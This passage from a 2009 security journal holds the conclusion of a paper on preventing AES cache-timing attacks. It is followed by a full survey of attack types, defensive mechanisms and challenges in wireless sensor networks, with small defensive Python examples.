We have seen that Rijndael is vulnerable to the cache-timing attack. Beyond AES, such attacks are potentially applicable to any implementation of a cryptographic algorithm that performs data-dependent memory accesses. The main weakness detected in the Rijndael algorithm is its heavy use of table lookups, whose indices depend on the key and input and which dominate the running time. The countermeasures described in this paper represent a significant step towards developing a stable, attack-resistant AES algorithm. The DCF algorithm creates a scenario wherein the table lookups are accessed in constant time rather than in variable time. This prevents any attacker from writing a spy program to brute-force the key and data out of the cache data stored during the execution of the DCF algorithm. In the implementation of the DCF algorithm, the cache is flushed periodically during the encryption or decryption process, which prevents the attacker from tapping the cache for data. On the downside, there is a performance hit on the encryption time, but on the brighter side, the DCF algorithm stands strong against the cache-timing attack.
REFERENCES
[1] J. Daemen and V. Rijmen, "AES Proposal: Rijndael," AES Algorithm Submission, September 3, 1999.
[2] D. J. Bernstein, "Cache-timing attacks on AES," The University of Illinois at Chicago, IL 60607-7045, 2005.
[3] D. A. Osvik, A. Shamir, and E. Tromer, "Cache Attacks and Countermeasures: the Case of AES," Cryptology ePrint Archive, Report 2005/271, 2005.
[4] J. Bonneau and I. Mironov, "Cache-Collision Timing Attacks Against AES" (extended version), revised 2005-11-20.
[5] F. Svelto, E. Charbon, and S. J. E. Wilton, "Introduction to the special issue on the IEEE 2002 Custom Integrated Circuits Conference," University of Pavia.
[6] J. Nechvatal, E. Barker, L. Bassham, W. Burr, M. Dworkin, J. Foti, and E. Roback, "Report on the Development of the Advanced Encryption Standard (AES)," October 2, 2000.
[7] C. Percival, "Cache Missing for Fun and Profit," May 13, 2005.
[8] B. Schneier and D. Whiting, "A Performance Comparison of the Five AES Finalists" (PDF/PostScript), 2000-04-07. Retrieved 2006-08-13.
[9] N. Ferguson, R. Schroeppel, and D. Whiting, "A simple algebraic representation of Rijndael," Proceedings of Selected Areas in Cryptography 2001, Lecture Notes in Computer Science, pp. 103–111, Springer-Verlag, 2001. Retrieved 2006-10-06.
Authors' Biographies
Jalpa Bani is an M.S. student of Computer Science at the University of Bridgeport. She completed her undergraduate studies in Computer Engineering at Saurashtra University, Gujarat, India. She has a deep urge to learn more in the fields of Artificial Intelligence, Computer Networks, Database Management Systems, and Mobile Computing. During her undergraduate studies, she researched Cyborg, an active area in applied robotics. She continued her research quest by concentrating on security vulnerabilities in network and wireless communication protocols; 1024-bit+ encryption/decryption of data; and enhancing the performance of mobile database query engines. In April 2008, she published an innovative paper, "A New Dynamic Cache Flushing (DCF) Algorithm for Preventing Cache Timing Attack," at the IEEE Wireless Telecommunication Symposium (IEEE WTS 2008), Pomona, California. The paper presented a unique algorithm to prevent the cache-timing attack on the Rijndael algorithm. She also published a paper, "Adapting Anti-Plagiarism Tool into Coursework in Engineering Program," at the American Society for Engineering Education (ASEE) conference in Austin, TX in June 2009. She received a "Best Student Poster" Honorable Mention at the ASEE NE Conference in Bridgeport, CT in April 2009, and was honored with the "School of Engineering Academic Achievement Award" at the University of Bridgeport in May 2009.
Syed S. Rizvi is a Ph.D. student of Computer Science and Engineering at the University of Bridgeport. He received a B.S. in Computer Engineering from Sir Syed University of Engineering and Technology and an M.S. in Computer Engineering from Old Dominion University in 2001 and 2005, respectively. In the past, he has done research on bioinformatics projects, where he investigated the use of Linux-based cluster search engines for finding desired proteins in input and output sequences from multiple databases. For the last three years, his research has focused primarily on the modeling and simulation of a wide range of parallel/distributed systems and web-based training applications. Syed Rizvi is the author of 68 scholarly publications in various areas. His current research focuses on the design, implementation, and comparison of algorithms in the areas of multiuser communications, multipath signal detection, multi-access interference estimation, computational complexity and combinatorial optimization of multiuser receivers, peer-to-peer networking, network security, and reconfigurable coprocessor and FPGA-based architectures.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
A Survey of Attacks, Security Mechanisms and
Challenges in Wireless Sensor Networks
Dr. G. Padmavathi,
Prof and Head,
Dept. of Computer Science,
Avinashilingam University for Women,
Coimbatore, India,
ganapathi.padmavathi@gmail.com
Mrs. D. Shanmugapriya,
Lecturer,
Dept. of Information Technology,
Avinashilingam University for Women,
Coimbatore, India,
ds_priyaa@rediffmail.com
Abstract—Wireless sensor networks (WSNs) are an emerging technology with great potential to be employed in critical situations like battlefields and in commercial applications such as building and traffic surveillance, habitat monitoring, smart homes, and many more scenarios. One of the major challenges wireless sensor networks face today is security. While the deployment of sensor nodes in an unattended environment makes the networks vulnerable to a variety of potential attacks, the inherent power and memory limitations of sensor nodes make conventional security solutions infeasible. Sensing technology combined with processing power and wireless communication makes sensor networks likely to be deployed in great quantity in the future. The wireless communication technology, however, also brings various types of security threats. This paper discusses a wide variety of attacks in WSNs and their classification mechanisms, the different security mechanisms available to handle them, and the challenges faced.
Keywords-Wireless Sensor Network; Security Goal;
Security Attacks; Defensive mechanisms; Challenges
I. INTRODUCTION
Sensor networks are basically application-dependent. They are primarily designed for real-time collection and analysis of low-level data in hostile environments. For this reason they are well suited to a substantial amount of monitoring and surveillance applications. Popular wireless sensor network applications include wildlife monitoring, bushfire response, military command, intelligent communications, industrial quality control, observation of critical infrastructures, smart buildings, distributed robotics, traffic monitoring, examining human heart rates, etc. The majority of sensor networks are deployed in hostile environments with active intelligent opposition; hence security is a crucial issue. One obvious example is battlefield applications, where there is a pressing need for secrecy of location and for resistance to subversion and destruction of the network. Less obvious but just as important security-dependent applications include:

• Disasters: In many disaster scenarios, especially those induced by terrorist activities, it may be necessary to protect the location of casualties from unauthorized disclosure.

• Public Safety: In applications where chemical, biological, or other environmental threats are monitored, it is vital that the availability of the network is never threatened. Attacks causing false alarms may lead to panic responses or, even worse, total disregard for the signals.

• Home Healthcare: In such applications, privacy protection is essential. Only authorized users should be able to query and monitor the network.

The major contributions of this paper are a classification of security attacks, security mechanisms, and challenges in wireless sensor networks. Section 2 gives detailed information about the security goals in wireless sensor networks. Security attacks and their classification are discussed in Section 3. Section 4 discusses the various security mechanisms. The major challenges faced are given in Section 5, followed by the conclusion.
II. SECURITY GOALS FOR SENSOR NETWORKS
As sensor networks can also operate in an ad hoc manner, the security goals cover both those of traditional networks and goals suited to the unique constraints of ad hoc sensor networks. The security goals are classified as primary and secondary [5]. The primary goals are the standard security goals of Confidentiality, Integrity, Authentication, and Availability (CIAA). The secondary goals are Data Freshness, Self-Organization, Time Synchronization, and Secure Localization.
The primary goals are:
A. Data Confidentiality
Confidentiality is the ability to conceal messages from a passive attacker so that any message communicated via the sensor network remains confidential. This is the most important issue in network security. A sensor node should not reveal its data to its neighbors.
B. Data Authentication
Authentication ensures the reliability of a message by identifying its origin. Attacks in sensor networks do not just involve the alteration of packets; adversaries can also inject additional false packets [14]. Data authentication verifies the identity of the senders and receivers. It is achieved through symmetric or asymmetric mechanisms in which sending and receiving nodes share secret keys. Due to the wireless nature of the medium and the unattended nature of sensor networks, it is extremely challenging to ensure authentication.
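A minimal sketch of the symmetric shared-key mechanism mentioned above, using an HMAC tag appended to each packet (the specific construction and the pre-shared key are illustrative; the paper does not prescribe one):

```python
import hmac
import hashlib

SHARED_KEY = b"pairwise-secret-between-two-nodes"  # hypothetical pre-shared key

def authenticate(payload: bytes) -> bytes:
    """Sender side: append a MAC computed with the shared key."""
    tag = hmac.new(SHARED_KEY, payload, hashlib.sha256).digest()
    return payload + tag

def verify(message: bytes) -> bytes:
    """Receiver side: recompute the MAC; reject forged or altered packets."""
    payload, tag = message[:-32], message[-32:]
    expected = hmac.new(SHARED_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: packet forged or altered")
    return payload
```

Real WSN schemes use much shorter tags and lighter primitives to fit the power and memory constraints discussed above; the structure, however, is the same.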
C. Data Integrity
Data integrity in sensor networks is needed to ensure the reliability of the data; it refers to the ability to confirm that a message has not been tampered with, altered, or changed. Even if the network has confidentiality measures, there is still a possibility that data integrity has been compromised by alterations. The integrity of the network is in trouble when:

• A malicious node present in the network injects false data.

• Unstable conditions due to the wireless channel cause damage or loss of data. [4]
D. Data Availability
Availability determines whether a node has the ability to use the resources and whether the network is available for messages to be communicated. Failure of the base station or of a cluster leader will eventually threaten the entire sensor network. Thus availability is of primary importance for maintaining an operational network.
The secondary goals are:
E. Data Freshness
Even if confidentiality and data integrity are assured, there is still a need to ensure the freshness of each message. Informally, data freshness [4] means that the data is recent, and it ensures that no old messages have been replayed. To solve this problem a nonce, or another time-related counter, can be added to the packet to ensure data freshness.
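The counter-based variant of this idea can be sketched as follows (the 8-byte field layout is a hypothetical choice for illustration):

```python
import struct

class FreshnessChecker:
    """Receiver-side replay protection: accept a packet only if its
    counter is strictly greater than the last counter seen."""
    def __init__(self):
        self.last_counter = -1

    def accept(self, packet: bytes) -> bytes:
        counter, = struct.unpack(">Q", packet[:8])   # 8-byte big-endian counter
        if counter <= self.last_counter:
            raise ValueError("stale or replayed packet")
        self.last_counter = counter
        return packet[8:]

def make_packet(counter: int, payload: bytes) -> bytes:
    """Sender side: prefix the payload with a monotonically increasing counter."""
    return struct.pack(">Q", counter) + payload
```

In a deployed scheme the counter would be covered by the message's authentication tag, so that an attacker cannot simply rewrite it.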
F. Self-Organization
A wireless sensor network is typically an ad hoc network, which requires every sensor node to be independent and flexible enough to be self-organizing and self-healing according to different situations. There is no fixed infrastructure available for the purpose of network management in a sensor network. This inherent feature brings a great challenge to wireless sensor network security. If self-organization is lacking in a sensor network, the damage resulting from an attack, or even from the risky environment itself, may be devastating.
G. Time Synchronization
Most sensor network applications rely on some form of time synchronization. Furthermore, sensors may wish to compute the end-to-end delay of a packet as it travels between two pairwise sensors. A more collaborative sensor network may require group synchronization [4] for tracking applications.
H. Secure Localization

Often, the utility of a sensor network relies on its ability to accurately and automatically locate each sensor in the network. A sensor network designed to locate faults needs accurate location information in order to pinpoint the location of a fault. Unfortunately, an attacker can easily manipulate non-secured location information by reporting false signal strengths and replaying signals.
This section discussed the security goals widely applicable to wireless sensor networks; the next section explains the attacks that commonly occur against them.
III. ATTACKS ON SENSOR NETWORKS
Wireless sensor networks are vulnerable to security attacks due to the broadcast nature of the transmission medium. Furthermore, wireless sensor networks have an additional vulnerability because nodes are often placed in a hostile or dangerous environment where they are not physically protected. Basically, attacks are classified as active attacks and passive attacks. Figure 1 shows the classification of attacks under general categories and Figure 2 shows the classification of attacks on WSNs.
Figure 1. General Classification of Security Attacks
Figure 2. Classification of Security Attacks on WSN
A. Passive Attacks
The monitoring and listening of the communication channel by unauthorized attackers is known as a passive attack. Attacks against privacy are passive in nature.
1) Attacks against Privacy
The main privacy problem is not that sensor networks enable the collection of information; in fact, much information from sensor networks could probably be collected through direct site surveillance. Rather, sensor networks intensify the privacy problem because they make large volumes of information easily available through remote access. Hence, adversaries need not be physically present to maintain surveillance; they can gather information at low risk and in an anonymous manner. Some of the more common attacks [8] against sensor privacy are:

• Monitoring and Eavesdropping: This is the most common attack on privacy. By snooping on the data, the adversary can easily discover the communication contents. When the traffic conveys control information about the sensor network configuration, which contains potentially more detailed information than is accessible through the location server, eavesdropping acts effectively against the privacy protection.

• Traffic Analysis: Even when the messages transferred are encrypted, there remains a high possibility of analyzing the communication patterns. Sensor activities can potentially reveal enough information to enable an adversary to cause malicious harm to the sensor network.

• Camouflaged Adversaries: An adversary can insert its own node, or compromise existing nodes, to hide in the sensor network. These nodes can then masquerade as normal nodes to attract packets, misroute them, and conduct privacy analysis.
B. Active Attacks
Attacks in which unauthorized attackers monitor, listen to, and modify the data stream in the communication channel are known as active attacks. The following attacks are active in nature:

1. Routing Attacks in Sensor Networks
2. Denial of Service Attacks
3. Node Subversion
4. Node Malfunction
5. Node Outage
6. Physical Attacks
7. Message Corruption
8. False Node
9. Node Replication Attacks
10. Passive Information Gathering
1) Routing Attacks in Sensor Networks

Attacks which act on the network layer are called routing attacks. The following are the attacks that can happen while routing messages.

a) Spoofed, altered and replayed routing information

An unprotected ad hoc routing protocol is vulnerable to these types of attacks, as every node acts as a router and can therefore directly affect routing information, in order to:

• Create routing loops
• Extend or shorten source routes
• Generate false error messages
• Increase end-to-end latency [3]
b) Selective Forwarding

A malicious node can selectively drop only certain packets. This is especially effective if combined with an attack that gathers much traffic through the node. In sensor networks it is assumed that nodes faithfully forward received messages, but a compromised node might refuse to forward packets; its neighbors, however, might start using another route. [3]
c) Sinkhole Attack

Attracting traffic to a specific node is called a sinkhole attack. In this attack, the adversary's goal is to attract nearly all the traffic from a particular area through a compromised node. Sinkhole attacks typically work by making a compromised node look especially attractive to surrounding nodes. [3]
d) Sybil Attacks

In a Sybil attack, a single node duplicates itself and presents itself in multiple locations; that is, a single node presents multiple identities to the other nodes in the network. The Sybil attack targets fault-tolerant schemes such as distributed storage, multipath routing, and topology maintenance. Authentication and encryption techniques can prevent an outsider from launching a Sybil attack on the sensor network. [3]
e) Wormhole Attacks

In a wormhole attack, an attacker records packets (or bits) at one location in the network, tunnels them to another location, and retransmits them into the network. [3]
f) HELLO Flood Attacks

An attacker sends or replays a routing protocol's HELLO packets from one node to another with more energy, using HELLO packets as a weapon to convince the sensors in the WSN. In this type of attack, an attacker with a high radio transmission range and processing power sends HELLO packets to a number of sensor nodes that are isolated in a large area within the WSN. The sensors are thus convinced that the adversary is their neighbor. As a result, while sending information to the base station, the victim nodes try to route through the attacker, believing it to be their neighbor, and are ultimately spoofed by the attacker. [3]
2) Denial of Service

Denial of Service (DoS) is produced by the unintentional failure of nodes or by malicious action. The term DoS refers not only to an adversary's attempt to subvert, disrupt, or destroy a network, but also to any event that diminishes a network's capability to provide a service. In wireless sensor networks, several types of DoS attacks might be performed in different layers: at the physical layer, jamming and tampering; at the link layer, collision, exhaustion, and unfairness; at the network layer, neglect and greed, homing, misdirection, and black holes; and at the transport layer, malicious flooding and de-synchronization. Mechanisms to prevent DoS attacks include payment for network resources, pushback, strong authentication, and identification of traffic. [2]
3) Node Subversion

Capture of a node may reveal its information, including disclosure of cryptographic keys, and thus compromise the whole sensor network. A particular sensor might be captured, and information (such as keys) stored on it might be obtained by an adversary. [6]
4) Node Malfunction

A malfunctioning node will generate inaccurate data that could compromise the integrity of the sensor network, especially if it is a data-aggregating node such as a cluster leader. [6]
5) Node Outage

Node outage is the situation that occurs when a node stops functioning. In the case where a cluster leader stops functioning, the sensor network protocols should be robust enough to mitigate the effects of node outages by providing an alternate route. [6]
6) Physical Attacks

Sensor networks typically operate in hostile outdoor environments. In such environments, the small form factor of the sensors, coupled with the unattended and distributed nature of their deployment, makes them highly susceptible to physical attacks, i.e., threats of physical node destruction. Unlike many of the other attacks mentioned above, physical attacks destroy sensors permanently, so the losses are irreversible. For instance, attackers can extract cryptographic secrets, tamper with the associated circuitry, modify the programming in the sensors, or replace them with malicious sensors under the control of the attacker.
7) Message Corruption

Any modification of the content of a message by an attacker compromises its integrity. [9]
8) False Node
A false node attack involves the addition of a node by an adversary in order to inject malicious data. An intruder might add a node to the system that feeds false data or prevents the passage of true data. Insertion of a malicious node is one of the most dangerous attacks that can occur: malicious code injected into the network could spread to all nodes, potentially destroying the whole network or, even worse, taking over the network on behalf of an adversary [9].
9) Node Replication Attacks
Conceptually, a node replication attack is quite simple: an attacker seeks to add a node to an existing sensor network by copying the node ID of an existing sensor node. A node replicated in this way can severely disrupt a sensor network's performance: packets can be corrupted or even misrouted, which can result in a disconnected network, false sensor readings, and so on. If an attacker can gain physical access to the entire network, he can copy cryptographic keys to the replicated sensor nodes. By inserting the replicated nodes at specific network points, the attacker could easily manipulate a specific segment of the network, perhaps by disconnecting it altogether [1].
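The core idea behind many replica-detection schemes can be illustrated with a small sketch. This is a hypothetical toy example, not a protocol from the cited literature, and the function name and `max_distance` threshold are illustrative: a node ID announced at two locations farther apart than is physically plausible must belong to a replica.

```python
# Hypothetical sketch: flag node IDs whose announced locations conflict.
# Real replica-detection protocols distribute this check across randomly
# chosen witness nodes instead of relying on one central checker.
from collections import defaultdict

def find_replicated_ids(location_claims, max_distance=1.0):
    """location_claims: iterable of (node_id, (x, y)) pairs."""
    positions_by_id = defaultdict(list)
    for node_id, pos in location_claims:
        positions_by_id[node_id].append(pos)

    replicated = set()
    for node_id, positions in positions_by_id.items():
        for i in range(len(positions)):
            for j in range(i + 1, len(positions)):
                (x1, y1), (x2, y2) = positions[i], positions[j]
                # One physical node cannot be in two distant places at once.
                if ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5 > max_distance:
                    replicated.add(node_id)
    return replicated

claims = [(7, (0.0, 0.0)), (7, (50.0, 50.0)), (9, (3.0, 4.0))]
print(find_replicated_ids(claims))  # {7}: ID 7 is claimed at two distant points
```

In deployed schemes this check is randomized and distributed, since a single checker would itself be an attractive target.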
10) Passive Information Gathering
An adversary with powerful resources can collect information from a sensor network if the traffic is not encrypted. An intruder with an appropriately powerful receiver and a well-designed antenna can easily pick off the data stream. Interception of messages containing the physical locations of sensor nodes allows an attacker to locate the nodes and destroy them. Besides the locations of sensor nodes, an adversary can observe the application-specific content of messages, including message IDs, timestamps and other fields. To minimize the threat of passive information gathering, strong encryption techniques need to be used [8].
This section explained the attacks, and their classification, that commonly occur in wireless sensor networks. The next section discusses the security mechanisms that are used to handle these attacks.
IV. SECURITY MECHANISMS
Security mechanisms are used to detect, prevent and recover from security attacks. A wide variety of security schemes can be devised to counter malicious attacks, and these can be categorized as high-level and low-level. Figure 3 shows the classification of security mechanisms.
ISSN 1947-5500
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
Figure 3: Security mechanisms
A. Low-Level Mechanism
Low-level security primitives for securing sensor networks include:
1. Key establishment and trust setup
2. Secrecy and authentication
3. Privacy
4. Robustness to communication denial of service
5. Secure routing
6. Resilience to node capture
1) Key establishment and trust setup
The primary requirement in setting up a sensor network is the establishment of cryptographic keys. Sensor devices generally have limited computational power, and public-key cryptographic primitives are too expensive to use. Key-establishment techniques need to scale to networks with hundreds or thousands of nodes. In addition, the communication patterns of sensor networks differ from those of traditional networks: sensor nodes may need to set up keys with their neighbors and with data-aggregation nodes. The disadvantage of key-pool approaches is that an attacker who compromised sufficiently many nodes could reconstruct the complete key pool and break the scheme [1].
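The key-pool approach alluded to above can be sketched briefly. The following is an illustrative toy model, not taken from the cited papers, and the pool and ring sizes are arbitrary assumptions: each node is preloaded with a random subset of key IDs from a global pool, and two neighbors can establish a secure link only if their rings intersect. An attacker capturing many nodes gradually accumulates the whole pool, which is exactly the weakness noted above.

```python
# Toy sketch of random key predistribution (parameters are illustrative).
import random

POOL_SIZE = 1000   # size of the global key pool (assumed)
RING_SIZE = 50     # key IDs preloaded into each node (assumed)

def preload_node(rng):
    """Preload a node with a random key ring drawn from the global pool."""
    return set(rng.sample(range(POOL_SIZE), RING_SIZE))

def shared_key(ring_a, ring_b):
    """Return one shared key ID, or None if the rings do not intersect."""
    common = ring_a & ring_b
    return min(common) if common else None

rng = random.Random(42)
node_a, node_b = preload_node(rng), preload_node(rng)
print(shared_key(node_a, node_b))  # a key ID if the rings overlap, else None
```

The ring size is chosen so that two random rings intersect with high probability, trading memory per node against connectivity.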
2) Secrecy and authentication
Most sensor network applications require protection against eavesdropping, injection, and modification of packets. Cryptography is the standard defense, but remarkable system trade-offs arise when incorporating it into sensor networks. For point-to-point communication [12], end-to-end cryptography achieves a high level of security but requires that keys be set up among all end points, and it is incompatible with passive participation and local broadcast. Link-layer cryptography with a network-wide shared key simplifies key setup and supports passive participation and local broadcast, but intermediate nodes might eavesdrop on or alter messages. The earliest sensor networks are likely to use link-layer cryptography, because this approach provides the greatest ease of deployment among currently available network cryptographic approaches [6].
3) Privacy
Like other traditional networks, sensor networks also raise privacy concerns. Sensor networks initially deployed for legitimate purposes might subsequently be used in unanticipated ways. Providing awareness of the presence of sensor nodes and of data acquisition is particularly important [1].
4) Robustness to communication denial of service
An adversary may attempt to disrupt the network's operation by broadcasting a high-energy signal. If the transmission is powerful enough, the entire system's communication could be jammed. More sophisticated attacks are also possible: the adversary might inhibit communication by violating the 802.11 medium access control (MAC) protocol, for instance by transmitting while a neighbor is also transmitting or by continuously requesting channel access with a request-to-send signal [1].
5) Secure routing
Routing and data forwarding is a crucial service for enabling communication in sensor networks. Unfortunately, current routing protocols suffer from many security vulnerabilities. For example, an attacker might launch denial-of-service attacks on the routing protocol, preventing communication. The simplest attacks involve injecting malicious routing information into the network, resulting in routing inconsistencies. Simple authentication might guard
against injection attacks, but some routing protocols are susceptible to replay of legitimate routing messages by the attacker [6].
6) Resilience to node capture
One of the most challenging issues in sensor networks is resilience against node capture attacks. In most applications, sensor nodes are likely to be placed in locations easily accessible to attackers. Such exposure raises the possibility that an attacker might capture sensor nodes, extract cryptographic secrets, modify their programming, or replace them with malicious nodes under the attacker's control. Tamper-resistant packaging may be one defense, but it is expensive, and current technology does not provide a high level of security. Algorithmic solutions to the problem of node capture are preferable [1].
B. High-Level Mechanism
High-level security mechanisms for securing sensor networks include secure group management, intrusion detection, and secure data aggregation.
1) Secure group management
Each node in a wireless sensor network is limited in its computing and communication capabilities. However, interesting in-network data aggregation and analysis can be performed by groups of nodes. For example, a group of nodes might be responsible for jointly tracking a vehicle through the network. The actual nodes comprising the group may change continuously and quickly. Many other key services in wireless sensor networks are also performed by groups. Consequently, secure protocols for group management are required, securely admitting new group members and supporting secure group communication. The outcome of the group key computation is normally transmitted to a base station, and the output must be authenticated to ensure it comes from a valid group [1].
2) Intrusion detection
Wireless sensor networks are susceptible to many forms of intrusion. They require a solution that is fully distributed and inexpensive in terms of communication, energy, and memory requirements. The use of secure groups may be a promising approach for decentralized intrusion detection [1].
3) Secure data aggregation
One advantage of a wireless sensor network is the fine-grained sensing that large and dense sets of nodes can provide. The sensed values must be aggregated to avoid overwhelming amounts of traffic back to the base station. For example, the system may average the temperature of a geographic region, combine sensor values to compute the location and velocity of a moving object, or aggregate data to avoid false alarms in real-world event detection. Depending on the architecture of the wireless sensor network, aggregation may take place at many points in the network, and all aggregation locations must be secured [6].
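Why aggregation points need protection can be made concrete with a small sketch. This is a hypothetical illustration, not drawn from the cited works: a single compromised sensor injecting one extreme reading badly skews a mean-based aggregate, whereas a median-based aggregate tolerates a few false readings.

```python
# Hypothetical illustration: a mean is skewed by one compromised sensor's
# false reading, while a median remains close to the true value.
def aggregate_mean(readings):
    return sum(readings) / len(readings)

def aggregate_median(readings):
    ordered = sorted(readings)
    mid = len(ordered) // 2
    if len(ordered) % 2:
        return ordered[mid]
    return (ordered[mid - 1] + ordered[mid]) / 2

honest = [20.1, 19.8, 20.3, 20.0, 19.9]   # genuine temperature readings
with_false = honest + [500.0]             # one compromised sensor

print(aggregate_mean(with_false))    # badly skewed by the single false value
print(aggregate_median(with_false))  # still close to the true ~20 degrees
```

Robust aggregates like the median mitigate a few false inputs, but they do not replace securing the aggregator itself, which can still lie about the result.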
V. CHALLENGES OF SENSOR NETWORKS
The nature of large, ad-hoc wireless sensor networks presents significant challenges in designing security schemes. A wireless sensor network is a special network with many constraints compared to a traditional computer network.
A. Wireless Medium
The wireless medium is inherently less secure because its broadcast nature makes eavesdropping simple. Any transmission can easily be intercepted, altered, or replayed by an adversary. The wireless medium also allows an attacker to easily intercept valid packets and inject malicious ones. Although this problem is not unique to sensor networks, traditional solutions must be adapted to execute efficiently on sensor networks [7].
B. Ad-Hoc Deployment
The ad-hoc nature of sensor networks means no structure can be statically defined. The network topology is always subject to change due to node failure, addition, or mobility. Nodes may be deployed by airdrop, so nothing is known of the topology prior to deployment. Since nodes may fail or be replaced, the network must support self-configuration. Security schemes must be able to operate within this dynamic environment.
C. Hostile Environment
The next challenging factor is the hostile environment in which sensor nodes function. Motes face the possibility of destruction or capture by attackers. Since nodes may be in a hostile environment, attackers can easily gain physical access to the devices. Attackers may capture a node, physically disassemble it, and extract valuable information from it (e.g., cryptographic keys). This highly hostile environment represents a serious challenge for security researchers.
D. Resource Scarcity
The extreme resource limitations of sensor devices pose considerable challenges to resource-hungry security mechanisms. The hardware constraints necessitate extremely efficient security algorithms in terms of bandwidth, computational complexity, and memory, which is no trivial task. Energy is the most precious resource in sensor networks, and communication is especially expensive in terms of power. Clearly, security mechanisms must be communication-efficient in order to be energy-efficient [5].
E. Immense Scale
The proposed scale of sensor networks poses a significant challenge for security mechanisms. Simply networking tens to hundreds of thousands of nodes has proven to be a substantial task, and providing security over such a network is equally challenging. Security mechanisms must be scalable to very large networks while maintaining high computation and communication efficiency.
F. Unreliable Communication
Certainly, unreliable communication is another threat to sensor security. The security of the network relies heavily on a defined protocol, which in turn depends on communication [5].
• Unreliable Transfer: Normally the packet-based routing of the sensor network is connectionless and thus inherently unreliable.
• Conflicts: Even if the channel is reliable, the communication may still be unreliable. This is due to the broadcast nature of the wireless sensor network.
• Latency: Multi-hop routing, network congestion and node processing can lead to greater latency in the network, making it difficult to achieve synchronization among sensor nodes.
G. Unattended Operation
Depending on the function of the particular sensor network, the sensor nodes may be left unattended for long periods of time. There are three main caveats to unattended sensor nodes [5]:
• Exposure to Physical Attacks: The sensors may be deployed in an environment open to adversaries, bad weather, and so on. The probability that a sensor suffers a physical attack in such an environment is therefore much higher than for a typical PC, which is located in a secure place and mainly faces attacks from a network.
• Managed Remotely: Remote management of a sensor network makes it virtually impossible to detect physical tampering and physical maintenance issues.
• No Central Management Point: A sensor network should be a distributed network without a central management point. This increases the vitality of the sensor network; however, if designed incorrectly, it makes network organization difficult, inefficient, and fragile.
Perhaps most importantly, the longer a sensor is left unattended, the more likely it is that an adversary has compromised the node.
VI. CONCLUSION
The deployment of sensor nodes in an unattended environment makes the networks vulnerable. Wireless sensor networks are increasingly being used in military, environmental, health and commercial applications. Sensor networks are inherently different from traditional wired networks as well as from wireless ad-hoc networks. Security is an important requirement for the deployment of wireless sensor networks. This paper summarized the attacks on wireless sensor networks and their classifications, explored the security mechanisms widely used to handle those attacks, and briefly discussed the challenges of wireless sensor networks. This survey will hopefully motivate future researchers to come up with smarter and more robust security mechanisms and make their networks safer.
REFERENCES
[1] A. Perrig, J. Stankovic, and D. Wagner, "Security in Wireless Sensor Networks", Communications of the ACM, pp. 53-57, 2004.
[2] A.-S. K. Pathan, H.-W. Lee, and C. S. Hong, "Security in Wireless Sensor Networks: Issues and Challenges", International Conference on Advanced Computing Technologies, pp. 1043-1045, 2006.
[3] C. Karlof and D. Wagner, "Secure Routing in Wireless Sensor Networks: Attacks and Countermeasures", Ad Hoc Networks (Elsevier), pp. 299-302, 2003.
[4] I. F. Akyildiz, W. Su, Y. Sankarasubramaniam, and E. Cayirci, "A Survey on Sensor Networks", IEEE Communications Magazine, 2002.
[5] J. P. Walters, Z. Liang, W. Shi, and V. Chaudhary, "Wireless Sensor Network Security: A Survey", in Security in Distributed, Grid and Pervasive Computing, Y. Xiao (Ed.), pp. 3-5, 10-15, 2006.
[6] A. S. K. Pathan, H.-W. Lee, and C. S. Hong, "Security in wireless sensor networks: issues and challenges", Advanced Communication Technology (ICACT), p. 6, 2006.
[7] T. Naeem and K.-K. Loo, "Common Security Issues and Challenges in Wireless Sensor Networks and IEEE 802.11 Wireless Mesh Networks", International Journal of Digital Content Technology and its Applications, vol. 3, no. 1, pp. 89-90, 2009.
[8] J. Undercoffer, S. Avancha, A. Joshi, and J. Pinkston, "Security for sensor networks", in Proceedings of the CADIP Research Symposium, University of Maryland, Baltimore County, USA, 2002. http://www.cs.sfu.ca/~angiez/personal/paper/sensor-ids.pdf
[9] T. Zia and A. Zomaya, "Security Issues in Wireless Sensor Networks", Systems and Networks Communications (ICSNC), p. 40, 2006.
[10] X. Chen, K. Makki, K. Yen, and N. Pissinou, "Sensor Network Security: A Survey", IEEE Communications Surveys & Tutorials, vol. 11, no. 2, pp. 52-62, 2009.
[11] D. E. Culler and W. Hong, "Wireless Sensor Networks", Communications of the ACM, vol. 47, no. 6, pp. 30-33, June 2004.
[12] D. Djenouri, L. Khelladi, and N. Badache, "A Survey of Security Issues in Mobile Ad Hoc and Sensor Networks", IEEE Communications Surveys & Tutorials, vol. 7, pp. 2-28, 2005.
[13] S. Schmidt, H. Krahn, S. Fischer, and D. Watjen, "A Security Architecture for Mobile Wireless Sensor Networks", in Proc. 1st European Workshop on Security in Ad-Hoc and Sensor Networks (ESAS), 2004.
[14] Y. Wang, G. Attebury, and B. Ramamurthy, "A Survey of Security Issues in Wireless Sensor Networks", IEEE Communications Surveys & Tutorials, vol. 8, pp. 2-23, 2006.
[15] Y. Zhou, Y. Fang, and Y. Zhang, "Securing Wireless Sensor Networks: A Survey", IEEE Communications Surveys & Tutorials, 2008.
[16] X. Ren, "Security Methods for Wireless Sensor Networks", in Proceedings of the 2006 IEEE International Conference on Mechatronics and Automation, p. 1925, 2006.
[17] R. Roman, J. Zhou, and J. Lopez, "On the security of wireless sensor networks", in International Conference on Computational Science and Its Applications (ICCSA 2005), May 9-12, 2005, vol. 3482 of Lecture Notes in Computer Science, Singapore, pp. 681-690, Springer Verlag, Heidelberg, Germany, 2005.
[18] N. Sastry and D. Wagner, "Security considerations for IEEE 802.15.4 networks", in Proceedings of the 2004 ACM Workshop on Wireless Security, pp. 32-42, Philadelphia, PA, USA: ACM Press, 2004.
[19] L. Weimin, Y. Zongkai, C. Wenqing, and T. Yunmeng, "Research on the Security in Wireless Sensor Network", Asian Journal of Information Technology, pp. 339-345, 2006.
AUTHORS PROFILE
Dr. Padmavathi Ganapathi is the Professor and Head of the Department of Computer Science, Avinashilingam University for Women, Coimbatore. She has 21 years of teaching experience and one year of industrial experience. Her areas of interest include network security, cryptography and real-time communication. She has more than 50 publications at national and international level. She is a life member of many professional organizations such as CSI, ISTE, AACE, WSEAS, ISCA, and UWA.

